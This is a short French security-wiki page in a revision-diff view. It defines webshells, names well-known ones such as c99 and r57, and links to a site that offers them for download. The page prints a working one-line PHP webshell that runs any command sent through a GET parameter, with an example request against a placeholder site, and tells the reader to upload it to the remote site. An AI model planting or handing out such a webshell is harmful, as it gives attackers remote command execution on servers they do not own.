Wiki sécurité informatique

Outils pour utilisateurs

Outils du site

Piste:
web:webshell

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

web:webshell [2017/01/18 15:45] (Version actuelle)
arkinar créée
Ligne 1: Ligne 1:
 +**WEBSHELL**
 +
 +**1.Présentation**
 +
 +Un Web Shell  est un script développé le plus souvent en PHP, ASP et qui permet d’exécuter des commandes à distance sur le serveur.
 +
 +Les plus connu sont c99, c100, r57. Ce sont des webshells évolués permettant toute une multitude de possibilités.
 +
 +<​del>​c99 une backdoor backdooré c'est un comble non ?</​del>​
 +
 +
 +**2.Exploitation**
 +
 +Dans un premier temps il faut uploader ou insérer notre webshell dans le site web distant.
 +
 +Dans un second temps nous pouvons exécuter toutes les commandes que nous souhaitons avec les droits de l'​utilisateur web.
 +
 +__2.1 Méthode 1 : Script fait maison__
 +
 +Le script fait maison sera toujours la meilleur solution. ​
 +
 +Il s’adaptera parfaitement à votre besoin.
 +
 +Un webshell peut être concis , il n'est pas obligé d'​être très long :
 +
 +<file php webshell.php>​
 +<?php $cmd=$_GET["​cmd"​];​ echo `$cmd`; ?>
 +</​file>​
 +
 +Afficher l'id de l'​utilisateur
 +<​code>​
 +http://​monsitefaillible.fr/​webshell.php?​cmd=id
 +
 +=> uid=33(www-data) gid=33(www-data) groups=33(www-data)
 +</​code>​
 +
 +__2.2 Méthode 2 : Script récupéré__
 +
 +De nombreux webshells se trouvent sur internet. Analysez les avant de les utilisez , ils contiennent souvent des mauvaises surprises.
 +
 +[[http://​www.r57.gen.tr/​|site téléchargement webshell]]
 +
  
web/webshell.txt · Dernière modification: 2017/01/18 15:45 par arkinar

Outils de la page

Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki